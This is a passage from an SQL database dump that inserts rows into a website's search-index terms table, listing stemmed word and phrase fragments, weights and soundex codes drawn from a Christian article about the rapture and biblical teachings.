(268694, 'detest', 'detest', 0, 0, 0.4, 'D230', 1, '*'),
(268695, 'detest holding', 'detest holding', 0, 1, 1.4667, 'D234352', 1, '*'),
(268696, 'detest holding unto', 'detest holding unto', 0, 1, 1.6333, 'D23435253', 1, '*'),
(268697, 'differs', 'differ', 0, 0, 0.4667, 'D162', 1, '*'),
(268698, 'differs from', 'differ from', 0, 1, 1.4, 'D162165', 1, '*'),
(268699, 'differs from the', 'differ from the', 0, 1, 1.5333, 'D1621653', 1, '*'),
(268700, 'directly conflict', 'directli conflict', 0, 1, 1.5667, 'D6234251423', 1, '*'),
(268701, 'directly conflict with', 'directli conflict with', 0, 1, 1.7333, 'D6234251423', 1, '*'),
(268702, 'disobedience to parents', 'disobedi to parents', 0, 1, 1.7667, 'D21352316532', 1, '*'),
(268703, 'do on', 'do on', 0, 1, 1.1667, 'D500', 1, '*'),
(268704, 'do on the', 'do on the', 0, 1, 1.3, 'D530', 1, '*'),
(268705, 'doctrines that', 'doctrin that', 0, 1, 1.4667, 'D236523', 1, '*'),
(268706, 'doctrines that directly', 'doctrin that directly', 0, 1, 1.7667, 'D2365236234', 1, '*'),
(268707, 'doctrines that permits', 'doctrin that permits', 0, 1, 1.7333, 'D23652316532', 1, '*'),
(268708, 'doctrines these', 'doctrin these', 0, 1, 1.5, 'D2365232', 1, '*'),
(268709, 'doctrines these are', 'doctrin these are', 0, 1, 1.6333, 'D23652326', 1, '*'),
(268710, 'eager', 'eager', 0, 0, 0.3333, 'E260', 1, '*'),
(268711, 'eager to', 'eager to', 0, 1, 1.2667, 'E263', 1, '*'),
(268712, 'eager to obtain', 'eager to obtain', 0, 1, 1.5, 'E263135', 1, '*'),
(268713, 'earth mat', 'earth mat', 0, 1, 1.3, 'E6353', 1, '*'),
(268714, 'earth mat 24', 'earth mat 24', 0, 1, 1.4, 'E6353', 1, '*'),
(268715, 'earth they', 'earth they', 0, 1, 1.3333, 'E630', 1, '*'),
(268716, 'earth they despised', 'earth they despised', 0, 1, 1.6333, 'E632123', 1, '*'),
(268717, 'elijah', 'elijah', 0, 0, 0.4, 'E420', 1, '*'),
(268718, 'elijah and', 'elijah and', 0, 1, 1.3333, 'E4253', 1, '*'),
(268719, 'elijah and elisha', 'elijah and elisha', 0, 1, 1.5667, 'E425342', 1, '*'),
(268720, 'elisha in', 'elisha in', 0, 1, 1.3, 'E425', 1, '*'),
(268721, 'elisha in 2', 'elisha in 2', 0, 1, 1.3667, 'E425', 1, '*'),
(268722, 'end time calendar', 'end time calendar', 0, 1, 1.5667, 'E53524536', 1, '*'),
(268723, 'end to', 'end to', 0, 1, 1.2, 'E530', 1, '*'),
(268724, 'end to the', 'end to the', 0, 1, 1.3333, 'E530', 1, '*'),
(268725, 'eph 6', 'eph 6', 0, 1, 1.1667, 'E100', 1, '*'),
(268726, 'eph 6 1', 'eph 6 1', 0, 1, 1.2333, 'E100', 1, '*'),
(268727, 'eph.4', 'eph.4', 0, 0, 0.3333, 'E100', 1, '*'),
(268728, 'eph.4 11-14', 'eph.4 11-14', 0, 1, 1.3667, 'E100', 1, '*'),
(268729, 'eph.4 11-14 1', 'eph.4 11-14 1', 0, 1, 1.4333, 'E100', 1, '*'),
(268730, 'establishing the', 'establish the', 0, 1, 1.5333, 'E23142523', 1, '*'),
(268731, 'establishing the kingdom', 'establish the kingdom', 0, 1, 1.8, 'E2314252325235', 1, '*'),
(268732, 'event on', 'event on', 0, 1, 1.2667, 'E1535', 1, '*'),
(268733, 'event on god\'s', 'event on god', 0, 1, 1.4667, 'E1535232', 1, '*'),
(268734, 'ever be', 'ever be', 0, 1, 1.2333, 'E161', 1, '*'),
(268735, 'ever be with', 'ever be with', 0, 1, 1.4, 'E1613', 1, '*'),
(268736, 'every eye', 'everi eye', 0, 1, 1.3, 'E160', 1, '*'),
(268737, 'every eye shall', 'everi eye shall', 0, 1, 1.5, 'E1624', 1, '*'),
(268738, 'every other unlisted', 'everi other unlisted', 0, 1, 1.6667, 'E16365423', 1, '*'),
(268739, 'evil things', 'evil things', 0, 1, 1.3667, 'E14352', 1, '*'),
(268740, 'evil things you', 'evil things you', 0, 1, 1.5, 'E14352', 1, '*'),
(268741, 'example in', 'exampl in', 0, 1, 1.3333, 'E25145', 2, '*'),
(268742, 'example in the', 'exampl in the', 0, 1, 1.4667, 'E251453', 2, '*'),
(268743, 'excessively', 'excess', 0, 0, 0.7333, 'E214', 1, '*'),
(268744, 'excessively eager', 'excess eager', 0, 1, 1.5667, 'E21426', 1, '*'),
(268745, 'excessively eager to', 'excess eager to', 0, 1, 1.6667, 'E214263', 1, '*'),
(268746, 'expects children', 'expect children', 0, 1, 1.5333, 'E212324365', 1, '*'),
(268747, 'expects children to', 'expect children to', 0, 1, 1.6333, 'E2123243653', 1, '*'),
(268748, 'expense of right', 'expens of right', 0, 1, 1.5333, 'E21521623', 1, '*'),
(268749, 'eye shall', 'ey shall', 0, 1, 1.3, 'E240', 1, '*'),
(268750, 'eye shall see', 'ey shall see', 0, 1, 1.4333, 'E242', 1, '*'),
(268751, 'factors', 'factor', 0, 0, 0.4667, 'F2362', 1, '*'),
(268752, 'factors as', 'factor as', 0, 1, 1.3333, 'F2362', 1, '*'),
(268753, 'factors as a', 'factor as a', 0, 1, 1.4, 'F2362', 1, '*'),
(268754, 'factors that', 'factor that', 0, 1, 1.4, 'F23623', 1, '*'),
(268755, 'factors that can', 'factor that can', 0, 1, 1.5333, 'F2362325', 1, '*'),
(268756, 'fault finders', 'fault finders', 0, 1, 1.4333, 'F4315362', 1, '*'),
(268757, 'fault finders we', 'fault finders we', 0, 1, 1.5333, 'F4315362', 1, '*'),
(268758, 'finders', 'finder', 0, 0, 0.4667, 'F5362', 1, '*'),
(268759, 'finders we', 'finder we', 0, 1, 1.3333, 'F5362', 1, '*'),
(268760, 'finders we have', 'finder we have', 0, 1, 1.5, 'F53621', 1, '*'),
(268761, 'fire however', 'fire however', 0, 1, 1.4, 'F616', 1, '*'),
(268762, 'fire however rapture', 'fire however rapture', 0, 1, 1.6667, 'F616136', 1, '*'),
(268763, 'first and', 'first and', 0, 1, 1.3, 'F62353', 1, '*'),
(268764, 'first and then', 'first and then', 0, 1, 1.4667, 'F623535', 1, '*'),
(268765, 'first love', 'first love', 0, 1, 1.3333, 'F62341', 1, '*'),
(268766, 'first love rev', 'first love rev', 0, 1, 1.4667, 'F6234161', 1, '*'),
(268767, 'flesh galatians', 'flesh galatians', 0, 1, 1.5, 'F424352', 1, '*'),
(268768, 'flesh galatians 5', 'flesh galatians 5', 0, 1, 1.5667, 'F424352', 1, '*'),
(268769, 'flesh that violates', 'flesh that violates', 0, 1, 1.6333, 'F4231432', 1, '*'),
(268770, 'for a glorious', 'for a glorious', 0, 1, 1.4667, 'F62462', 1, '*'),
(268771, 'for rapture', 'for rapture', 0, 1, 1.3667, 'F6136', 1, '*'),
(268772, 'for the things', 'for the things', 0, 1, 1.4667, 'F6352', 1, '*'),
(268773, 'forbids', 'forbid', 0, 0, 0.4667, 'F6132', 1, '*'),
(268774, 'forbids rev', 'forbid rev', 0, 1, 1.3667, 'F613261', 1, '*'),
(268775, 'forbids rev 2', 'forbid rev 2', 0, 1, 1.4333, 'F613261', 1, '*'),
(268776, 'form of godliness', 'form of godliness', 0, 1, 1.5667, 'F65123452', 1, '*'),
(268777, 'found in the', 'found in the', 0, 1, 1.4, 'F5353', 1, '*'),
(268778, 'from going', 'from going', 0, 1, 1.3333, 'F65252', 1, '*'),
(268779, 'from going with', 'from going with', 0, 1, 1.5, 'F652523', 1, '*'),
(268780, 'from the second', 'from the second', 0, 1, 1.5, 'F653253', 1, '*'),
(268781, 'full of sin', 'full of sin', 0, 1, 1.3667, 'F4125', 1, '*'),
(268782, 'galatians', 'galatian', 0, 0, 0.6, 'G4352', 1, '*'),
(268783, 'galatians 5', 'galatian 5', 0, 1, 1.3667, 'G4352', 1, '*'),
(268784, 'galatians 5 19-21', 'galatian 5 19-21', 0, 1, 1.5667, 'G4352', 1, '*'),
(268785, 'giving heed', 'give heed', 0, 1, 1.3667, 'G1523', 2, '*'),
(268786, 'giving heed to', 'give heed to', 0, 1, 1.4667, 'G1523', 2, '*'),
(268787, 'glorious meeting', 'gloriou meeting', 0, 1, 1.5333, 'G4625352', 1, '*'),
(268788, 'glorious meeting with', 'gloriou meeting with', 0, 1, 1.7, 'G46253523', 1, '*'),
(268789, 'god bless', 'god bless', 0, 1, 1.3, 'G3142', 1, '*'),
(268790, 'god bless you', 'god bless you', 0, 1, 1.4333, 'G3142', 1, '*'),
(268791, 'god children', 'god children', 0, 1, 1.4, 'G324365', 1, '*'),
(268792, 'god children obey', 'god children obey', 0, 1, 1.5667, 'G3243651', 1, '*'),
(268793, 'god doctrines', 'god doctrines', 0, 1, 1.4333, 'G323652', 1, '*'),
(268794, 'god doctrines that', 'god doctrines that', 0, 1, 1.6, 'G3236523', 1, '*'),
(268795, 'god expects children', 'god expects children', 0, 1, 1.6667, 'G3212324365', 1, '*'),
(268796, 'god forbids', 'god forbids', 0, 1, 1.3667, 'G316132', 1, '*'),
(268797, 'god forbids rev', 'god forbids rev', 0, 1, 1.5, 'G31613261', 1, '*'),
(268798, 'god i see', 'god i see', 0, 1, 1.3, 'G320', 1, '*'),
(268799, 'god\'s end', 'god end', 0, 1, 1.3, 'G3253', 1, '*'),
(268800, 'god\'s end time', 'god end time', 0, 1, 1.4667, 'G32535', 1, '*'),
(268801, 'godliness', 'godli', 0, 0, 0.6, 'G3452', 1, '*'),
(268802, 'godliness but', 'godli but', 0, 1, 1.4333, 'G345213', 1, '*'),
(268803, 'godliness but denying', 'godli but denying', 0, 1, 1.7, 'G34521352', 1, '*'),
(268804, 'godliness but they', 'godli but they', 0, 1, 1.6, 'G345213', 1, '*'),
(268805, 'going with christ', 'go with christ', 0, 1, 1.5667, 'G5232623', 1, '*'),
(268806, 'good cynical', 'good cynical', 0, 1, 1.4, 'G32524', 1, '*'),
(268807, 'good cynical haters', 'good cynical haters', 0, 1, 1.6333, 'G32524362', 1, '*'),
(268808, 'good example', 'good example', 0, 1, 1.4, 'G32514', 1, '*'),
(268809, 'good example in', 'good example in', 0, 1, 1.5, 'G325145', 1, '*'),
(268810, 'good fault', 'good fault', 0, 1, 1.3333, 'G3143', 1, '*'),
(268811, 'good fault finders', 'good fault finders', 0, 1, 1.6, 'G314315362', 1, '*'),
(268812, 'good works that', 'good works that', 0, 1, 1.5, 'G3623', 1, '*'),
(268813, 'got it blasphemy', 'got it blasphemy', 0, 1, 1.5333, 'G314215', 1, '*'),
(268814, 'greed', 'greed', 0, 0, 0.3333, 'G630', 1, '*'),
(268815, 'greed 1', 'greed 1', 0, 1, 1.2333, 'G630', 1, '*'),
(268816, 'greed 1 cor', 'greed 1 cor', 0, 1, 1.3667, 'G6326', 1, '*'),
(268817, 'hated', 'hate', 0, 0, 0.3333, 'H300', 1, '*'),
(268818, 'hated him', 'hate him', 0, 1, 1.3, 'H350', 1, '*'),
(268819, 'hated him works', 'hate him works', 0, 1, 1.5, 'H3562', 1, '*'),
(268820, 'haters', 'hater', 0, 0, 0.4, 'H362', 1, '*'),
(268821, 'haters of', 'hater of', 0, 1, 1.3, 'H3621', 1, '*'),
(268822, 'haters of good', 'hater of good', 0, 1, 1.4667, 'H362123', 1, '*'),
(268823, 'have an appearance', 'have an appearance', 0, 1, 1.6, 'H151652', 1, '*'),
(268824, 'have one detest', 'have one detest', 0, 1, 1.5, 'H15323', 1, '*'),
(268825, 'having a form', 'have a form', 0, 1, 1.4333, 'H152165', 1, '*'),
(268826, 'heaven on', 'heaven on', 0, 1, 1.3, 'H150', 1, '*'),
(268827, 'heaven on earth', 'heaven on earth', 0, 1, 1.5, 'H1563', 1, '*'),
(268828, 'heed to witchcraft', 'heed to witchcraft', 0, 1, 1.6, 'H32613', 1, '*'),
(268829, 'hence establishing', 'henc establishing', 0, 1, 1.6, 'H52314252', 1, '*'),
(268830, 'hence establishing the', 'henc establishing the', 0, 1, 1.7333, 'H523142523', 1, '*'),
(268831, 'hence the', 'henc the', 0, 1, 1.3, 'H523', 1, '*'),
(268832, 'hence the bible', 'henc the bible', 0, 1, 1.5, 'H52314', 1, '*'),
(268833, 'him and hated', 'him and hated', 0, 1, 1.4333, 'H530', 1, '*'),
(268834, 'him with his', 'him with his', 0, 1, 1.4, 'H532', 1, '*'),
(268835, 'him works', 'him works', 0, 1, 1.3, 'H562', 1, '*'),
(268836, 'him works of', 'him works of', 0, 1, 1.4, 'H5621', 1, '*'),
(268837, 'hinder', 'hinder', 0, 0, 0.4, 'H536', 1, '*'),
(268838, 'hinder a', 'hinder a', 0, 1, 1.2667, 'H536', 1, '*'),
(268839, 'hinder a christian', 'hinder a christian', 0, 1, 1.6, 'H53626235', 1, '*'),
(268840, 'his agents', 'hi agents', 0, 1, 1.3333, 'H2532', 1, '*'),
(268841, 'his agents hence', 'hi agents hence', 0, 1, 1.5333, 'H253252', 1, '*'),
(268842, 'his saints', 'hi saints', 0, 1, 1.3333, 'H2532', 1, '*'),
(268843, 'his saints to', 'hi saints to', 0, 1, 1.4333, 'H25323', 1, '*'),
(268844, 'holding unto', 'hold unto', 0, 1, 1.4, 'H435253', 1, '*'),
(268845, 'holding unto strange', 'hold unto strange', 0, 1, 1.6667, 'H43525323652', 1, '*'),
(268846, 'honour and', 'honour and', 0, 1, 1.3333, 'H5653', 1, '*'),
(268847, 'honour and obey', 'honour and obey', 0, 1, 1.5, 'H56531', 1, '*'),
(268848, 'how i', 'how i', 0, 1, 1.1667, 'H000', 1, '*'),
(268849, 'how i got', 'how i got', 0, 1, 1.3, 'H230', 1, '*'),
(268850, 'however rapture', 'howev rapture', 0, 1, 1.5, 'H16136', 1, '*'),
(268851, 'however rapture still', 'howev rapture still', 0, 1, 1.7, 'H16136234', 1, '*'),
(268852, 'hypocrisy', 'hypocrisi', 0, 0, 0.6, 'H1262', 1, '*'),
(268853, 'hypocrisy having', 'hypocrisi having', 0, 1, 1.5333, 'H1262152', 1, '*'),
(268854, 'hypocrisy having a', 'hypocrisi having a', 0, 1, 1.6, 'H1262152', 1, '*'),
(268855, 'i got', 'i got', 0, 1, 1.1667, 'I230', 3, '*'),
(268856, 'i got it', 'i got it', 0, 1, 1.2667, 'I230', 1, '*'),
(268857, 'i see take', 'i see take', 0, 1, 1.3333, 'I232', 1, '*'),
(268858, 'imminent', 'immin', 0, 0, 0.5333, 'I530', 2, '*'),
(268859, 'imminent and', 'immin and', 0, 1, 1.4, 'I5353', 1, '*'),
(268860, 'imminent and could', 'immin and could', 0, 1, 1.6, 'I5353243', 1, '*'),
(268861, 'in 1 thessalonians', 'in 1 thessalonians', 0, 1, 1.6, 'I532452', 1, '*'),
(268862, 'in 2 kings', 'in 2 kings', 0, 1, 1.3333, 'I5252', 1, '*'),
(268863, 'in accordance to', 'in accordance to', 0, 1, 1.5333, 'I5263523', 1, '*'),
(268864, 'in christ for', 'in christ for', 0, 1, 1.4333, 'I5262316', 1, '*'),
(268865, 'in christ will', 'in christ will', 0, 1, 1.4667, 'I526234', 1, '*'),
(268866, 'in the air', 'in the air', 0, 1, 1.3333, 'I536', 1, '*'),
(268867, 'in the clouds', 'in the clouds', 0, 1, 1.4333, 'I532432', 1, '*'),
(268868, 'in the pharisees', 'in the pharisees', 0, 1, 1.5333, 'I53162', 1, '*'),
(268869, 'in which every', 'in which every', 0, 1, 1.4667, 'I5216', 1, '*'),
(268870, 'inherit', 'inherit', 0, 0, 0.4667, 'I563', 1, '*'),
(268871, 'inherit the', 'inherit the', 0, 1, 1.3667, 'I563', 1, '*'),
(268872, 'inherit the kingdom', 'inherit the kingdom', 0, 1, 1.6333, 'I56325235', 1, '*'),
(268873, 'inordinate', 'inordin', 0, 0, 0.6667, 'I56353', 1, '*'),
(268874, 'inordinate desire', 'inordin desire', 0, 1, 1.5667, 'I5635326', 1, '*'),
(268875, 'inordinate desire excessively', 'inordin desire excessively', 0, 1, 1.9667, 'I5635326214', 1, '*'),
(268876, 'insulting', 'insult', 0, 0, 0.6, 'I524352', 1, '*'),
(268877, 'insulting or', 'insult or', 0, 1, 1.4, 'I5243526', 1, '*'),
(268878, 'insulting or showing', 'insult or showing', 0, 1, 1.6667, 'I5243526252', 1, '*'),
(268879, 'inviolable', 'inviol', 0, 0, 0.6667, 'I51414', 1, '*'),
(268880, 'inviolable it', 'inviol it', 0, 1, 1.4333, 'I514143', 1, '*'),
(268881, 'inviolable it is', 'inviol it is', 0, 1, 1.5333, 'I5141432', 1, '*'),
(268882, 'irrelevance', 'irrelev', 0, 0, 0.7333, 'I64152', 1, '*'),
(268883, 'irrelevance towards', 'irrelev towards', 0, 1, 1.6333, 'I641523632', 1, '*'),
(268884, 'irrelevance towards something', 'irrelev towards something', 0, 1, 1.9667, 'I6415236325352', 1, '*'),
(268885, 'is a military', 'is a military', 0, 1, 1.4333, 'I25436', 1, '*'),
(268886, 'is found in', 'is found in', 0, 1, 1.3667, 'I21535', 1, '*'),
(268887, 'is imminent', 'is imminent', 0, 1, 1.3667, 'I253', 2, '*'),
(268888, 'is imminent and', 'is imminent and', 0, 1, 1.5, 'I25353', 1, '*'),
(268889, 'is profanity', 'is profanity', 0, 1, 1.4, 'I216153', 1, '*'),
(268890, 'is profanity matt.12', 'is profanity matt.12', 0, 1, 1.6667, 'I21615353', 1, '*'),
(268891, 'is the act', 'is the act', 0, 1, 1.3333, 'I2323', 1, '*'),
(268892, 'is the rapture', 'is the rapture', 0, 1, 1.4667, 'I236136', 1, '*'),
(268893, 'is the visible', 'is the visible', 0, 1, 1.4667, 'I231214', 1, '*'),
(268894, 'is there still', 'is there still', 0, 1, 1.4667, 'I236234', 1, '*'),
(268895, 'it blasphemy', 'it blasphemy', 0, 1, 1.4, 'I314215', 1, '*'),
(268896, 'it blasphemy means', 'it blasphemy means', 0, 1, 1.6, 'I3142152', 1, '*'),
(268897, 'it is imminent', 'it is imminent', 0, 1, 1.4667, 'I3253', 1, '*'),
(268898, 'it is profanity', 'it is profanity', 0, 1, 1.5, 'I3216153', 1, '*'),
(268899, 'it is that', 'it is that', 0, 1, 1.3333, 'I323', 1, '*'),
(268900, 'it or how', 'it or how', 0, 1, 1.3, 'I360', 1, '*'),
(268901, 'item 15', 'item 15', 0, 1, 1.2333, 'I350', 1, '*'),
(268902, 'item 15 rapture', 'item 15 rapture', 0, 1, 1.5, 'I356136', 1, '*'),
(268903, 'jezebel', 'jezebel', 0, 0, 0.4667, 'J140', 1, '*'),
(268904, 'jezebel and', 'jezebel and', 0, 1, 1.3667, 'J1453', 1, '*'),
(268905, 'jezebel and also', 'jezebel and also', 0, 1, 1.5333, 'J145342', 1, '*'),
(268906, 'john3', 'john3', 0, 0, 0.3333, 'J500', 1, '*'),
(268907, 'john3 2', 'john3 2', 0, 1, 1.2333, 'J500', 1, '*'),
(268908, 'john3 2 matt.24', 'john3 2 matt.24', 0, 1, 1.5, 'J530', 1, '*'),
(268909, 'jude 14', 'jude 14', 0, 1, 1.2333, 'J300', 1, '*'),
(268910, 'jude 14 rev.9', 'jude 14 rev.9', 0, 1, 1.4333, 'J361', 1, '*'),
(268911, 'k2 item 15', 'k2 item 15', 0, 1, 1.3333, 'K350', 1, '*'),
(268912, 'kingdom of heaven', 'kingdom of heaven', 0, 1, 1.5667, 'K523515', 1, '*'),
(268913, 'kings 2', 'king 2', 0, 1, 1.2333, 'K520', 1, '*'),
(268914, 'kings 2 11', 'king 2 11', 0, 1, 1.3333, 'K520', 1, '*'),
(268915, 'leaving your first', 'leav your first', 0, 1, 1.6, 'L15261623', 1, '*'),
(268916, 'life take', 'life take', 0, 1, 1.3, 'L132', 1, '*'),
(268917, 'life take a', 'life take a', 0, 1, 1.3667, 'L132', 1, '*'),
(268918, 'like every', 'like every', 0, 1, 1.3333, 'L216', 1, '*'),
(268919, 'like every other', 'like every other', 0, 1, 1.5333, 'L21636', 1, '*'),
(268920, 'list is', 'list is', 0, 1, 1.2333, 'L232', 1, '*'),
(268921, 'list is there', 'list is there', 0, 1, 1.4333, 'L23236', 1, '*'),
(268922, 'lord eph', 'lord eph', 0, 1, 1.2667, 'L631', 1, '*'),
(268923, 'lord eph 6', 'lord eph 6', 0, 1, 1.3333, 'L631', 1, '*'),
(268924, 'lord in the', 'lord in the', 0, 1, 1.3667, 'L6353', 1, '*'),
(268925, 'lord the', 'lord the', 0, 1, 1.2667, 'L630', 1, '*'),
(268926, 'lord the very', 'lord the very', 0, 1, 1.4333, 'L6316', 1, '*'),
(268927, 'love rev', 'love rev', 0, 1, 1.2667, 'L161', 1, '*'),
(268928, 'love rev 2', 'love rev 2', 0, 1, 1.3333, 'L161', 1, '*'),
(268929, 'make the', 'make the', 0, 1, 1.2667, 'M230', 1, '*'),
(268930, 'make the rapture', 'make the rapture', 0, 1, 1.5333, 'M236136', 1, '*'),
(268931, 'mark 8', 'mark 8', 0, 1, 1.2, 'M620', 1, '*'),
(268932, 'mark 8 38', 'mark 8 38', 0, 1, 1.3, 'M620', 1, '*'),
(268933, 'mat 24 30-31', 'mat 24 30-31', 0, 1, 1.4, 'M300', 1, '*'),
(268934, 'matt.12', 'matt.12', 0, 0, 0.4667, 'M300', 1, '*'),
(268935, 'matt.12 13', 'matt.12 13', 0, 1, 1.3333, 'M300', 1, '*'),
(268936, 'matt.12 13 rev', 'matt.12 13 rev', 0, 1, 1.4667, 'M361', 1, '*'),
(268937, 'matt.24 3', 'matt.24 3', 0, 1, 1.3, 'M300', 1, '*'),
(268938, 'matt.24 3 27-51', 'matt.24 3 27-51', 0, 1, 1.5, 'M300', 1, '*'),
(268939, 'matthew 13 22', 'matthew 13 22', 0, 1, 1.4333, 'M300', 1, '*'),
(268940, 'meaning', 'mean', 0, 0, 0.4667, 'M200', 2, '*'),
(268941, 'meaning “a', 'mean “a', 0, 1, 1.3333, 'M200', 1, '*'),
(268942, 'meaning “a quick', 'mean “a quick', 0, 1, 1.5333, 'M200', 1, '*'),
(268943, 'means irrelevance', 'mean irrelevance', 0, 1, 1.5667, 'M264152', 1, '*'),
(268944, 'means irrelevance towards', 'mean irrelevance towards', 0, 1, 1.8333, 'M2641523632', 1, '*'),
(268945, 'meet the', 'meet the', 0, 1, 1.2667, 'M300', 1, '*'),
(268946, 'meet the lord', 'meet the lord', 0, 1, 1.4333, 'M3463', 1, '*'),
(268947, 'meeting with', 'meet with', 0, 1, 1.4, 'M3523', 1, '*'),
(268948, 'meeting with christ', 'meet with christ', 0, 1, 1.6333, 'M35232623', 1, '*'),
(268949, 'military', 'militari', 0, 0, 0.5333, 'M436', 2, '*'),
(268950, 'military term', 'militari term', 0, 1, 1.4333, 'M436365', 1, '*'),
(268951, 'military term meaning', 'militari term meaning', 0, 1, 1.7, 'M4363652', 1, '*'),
(268952, 'minding', 'mind', 0, 0, 0.4667, 'M352', 2, '*'),
(268953, 'minding who', 'mind who', 0, 1, 1.3667, 'M352', 1, '*'),
(268954, 'minding who owns', 'mind who owns', 0, 1, 1.5333, 'M35252', 1, '*'),
(268955, 'misrule', 'misrul', 0, 0, 0.4667, 'M264', 1, '*'),
(268956, 'misrule of', 'misrul of', 0, 1, 1.3333, 'M2641', 1, '*'),
(268957, 'misrule of satan', 'misrul of satan', 0, 1, 1.5333, 'M2641235', 1, '*'),
(268958, 'next event', 'next event', 0, 1, 1.3333, 'N23153', 1, '*'),
(268959, 'next event on', 'next event on', 0, 1, 1.4333, 'N231535', 1, '*'),
(268960, 'not inherit', 'not inherit', 0, 1, 1.3667, 'N3563', 1, '*'),
(268961, 'not inherit the', 'not inherit the', 0, 1, 1.5, 'N3563', 1, '*'),
(268962, 'not minding', 'not minding', 0, 1, 1.3667, 'N35352', 1, '*'),
(268963, 'not minding who', 'not minding who', 0, 1, 1.5, 'N35352', 1, '*'),
(268964, 'notable', 'notabl', 0, 0, 0.4667, 'N314', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(268965, 'notable thing', 'notabl thing', 0, 1, 1.4333, 'N314352', 1, '*'),
(268966, 'notable thing about', 'notabl thing about', 0, 1, 1.6333, 'N31435213', 1, '*'),
(268967, 'obey their', 'obei their', 0, 1, 1.3333, 'O136', 1, '*'),
(268968, 'obey their parents', 'obei their parents', 0, 1, 1.6, 'O13616532', 1, '*'),
(268969, 'obey your', 'obei your', 0, 1, 1.3, 'O160', 1, '*'),
(268970, 'obey your parents', 'obei your parents', 0, 1, 1.5667, 'O1616532', 1, '*'),
(268971, 'obtain and', 'obtain and', 0, 1, 1.3333, 'O1353', 1, '*'),
(268972, 'obtain and possess', 'obtain and possess', 0, 1, 1.6, 'O135312', 1, '*'),
(268973, 'of all the', 'of all the', 0, 1, 1.3333, 'O143', 1, '*'),
(268974, 'of christ rapture', 'of christ rapture', 0, 1, 1.5667, 'O126236136', 1, '*'),
(268975, 'of elijah', 'of elijah', 0, 1, 1.3, 'O142', 1, '*'),
(268976, 'of elijah and', 'of elijah and', 0, 1, 1.4333, 'O14253', 1, '*'),
(268977, 'of fire', 'of fire', 0, 1, 1.2333, 'O160', 1, '*'),
(268978, 'of fire however', 'of fire however', 0, 1, 1.5, 'O1616', 1, '*'),
(268979, 'of flesh galatians', 'of flesh galatians', 0, 1, 1.6, 'O1424352', 1, '*'),
(268980, 'of god children', 'of god children', 0, 1, 1.5, 'O12324365', 1, '*'),
(268981, 'of god doctrines', 'of god doctrines', 0, 1, 1.5333, 'O12323652', 1, '*'),
(268982, 'of god i', 'of god i', 0, 1, 1.2667, 'O123', 1, '*'),
(268983, 'of godliness', 'of godliness', 0, 1, 1.4, 'O123452', 1, '*'),
(268984, 'of godliness but', 'of godliness but', 0, 1, 1.5333, 'O12345213', 1, '*'),
(268985, 'of good', 'of good', 0, 1, 1.2333, 'O123', 1, '*'),
(268986, 'of good fault', 'of good fault', 0, 1, 1.4333, 'O123143', 1, '*'),
(268987, 'of heaven on', 'of heaven on', 0, 1, 1.4, 'O150', 1, '*'),
(268988, 'of insulting', 'of insulting', 0, 1, 1.4, 'O1524352', 1, '*'),
(268989, 'of insulting or', 'of insulting or', 0, 1, 1.5, 'O15243526', 1, '*'),
(268990, 'of jezebel', 'of jezebel', 0, 1, 1.3333, 'O1214', 1, '*'),
(268991, 'of jezebel and', 'of jezebel and', 0, 1, 1.4667, 'O121453', 1, '*'),
(268992, 'of riches pursuit', 'of riches pursuit', 0, 1, 1.5667, 'O1621623', 1, '*'),
(268993, 'of right', 'of right', 0, 1, 1.2667, 'O1623', 1, '*'),
(268994, 'of right standing', 'of right standing', 0, 1, 1.5667, 'O1623235352', 1, '*'),
(268995, 'of saints', 'of saints', 0, 1, 1.3, 'O12532', 1, '*'),
(268996, 'of saints is', 'of saints is', 0, 1, 1.4, 'O12532', 1, '*'),
(268997, 'of satan and', 'of satan and', 0, 1, 1.4, 'O12353', 1, '*'),
(268998, 'of sin', 'of sin', 0, 1, 1.2, 'O125', 1, '*'),
(268999, 'of sin and', 'of sin and', 0, 1, 1.3333, 'O1253', 1, '*'),
(269000, 'of these remaining', 'of these remaining', 0, 1, 1.6, 'O132652', 1, '*'),
(269001, 'of those that', 'of those that', 0, 1, 1.4333, 'O1323', 1, '*'),
(269002, 'of wealth', 'of wealth', 0, 1, 1.3, 'O143', 1, '*'),
(269003, 'of wealth at', 'of wealth at', 0, 1, 1.4, 'O143', 1, '*'),
(269004, 'old testament story', 'old testament story', 0, 1, 1.6333, 'O432353236', 1, '*'),
(269005, 'on earth mat', 'on earth mat', 0, 1, 1.4, 'O56353', 1, '*'),
(269006, 'on god\'s end', 'on god end', 0, 1, 1.4, 'O523253', 1, '*'),
(269007, 'one detest', 'on detest', 0, 1, 1.3333, 'O5323', 1, '*'),
(269008, 'one detest holding', 'on detest holding', 0, 1, 1.6, 'O53234352', 1, '*'),
(269009, 'one notable', 'on notable', 0, 1, 1.3667, 'O5314', 1, '*'),
(269010, 'one notable thing', 'on notable thing', 0, 1, 1.5667, 'O5314352', 1, '*'),
(269011, 'or how', 'or how', 0, 1, 1.2, 'O600', 1, '*'),
(269012, 'or how i', 'or how i', 0, 1, 1.2667, 'O600', 1, '*'),
(269013, 'or inviolable', 'or inviolable', 0, 1, 1.4333, 'O651414', 1, '*'),
(269014, 'or inviolable it', 'or inviolable it', 0, 1, 1.5333, 'O6514143', 1, '*'),
(269015, 'or showing', 'or showing', 0, 1, 1.3333, 'O6252', 1, '*'),
(269016, 'or showing contempt', 'or showing contempt', 0, 1, 1.6333, 'O625253513', 1, '*'),
(269017, 'other unlisted', 'other unlisted', 0, 1, 1.4667, 'O365423', 1, '*'),
(269018, 'other unlisted work', 'other unlisted work', 0, 1, 1.6333, 'O36542362', 1, '*'),
(269019, 'owns', 'own', 0, 0, 0.2667, 'O520', 1, '*'),
(269020, 'owns it', 'own it', 0, 1, 1.2333, 'O523', 1, '*'),
(269021, 'owns it or', 'own it or', 0, 1, 1.3333, 'O5236', 1, '*'),
(269022, 'parents god', 'parent god', 0, 1, 1.3667, 'P65323', 1, '*'),
(269023, 'parents god expects', 'parent god expects', 0, 1, 1.6333, 'P6532321232', 1, '*'),
(269024, 'parents in', 'parent in', 0, 1, 1.3333, 'P65325', 1, '*'),
(269025, 'parents in accordance', 'parent in accordance', 0, 1, 1.7, 'P6532526352', 1, '*'),
(269026, 'parents in the', 'parent in the', 0, 1, 1.4667, 'P653253', 1, '*'),
(269027, 'permits', 'permit', 0, 0, 0.4667, 'P6532', 1, '*'),
(269028, 'permits what', 'permit what', 0, 1, 1.4, 'P65323', 1, '*'),
(269029, 'permits what god', 'permit what god', 0, 1, 1.5333, 'P6532323', 1, '*'),
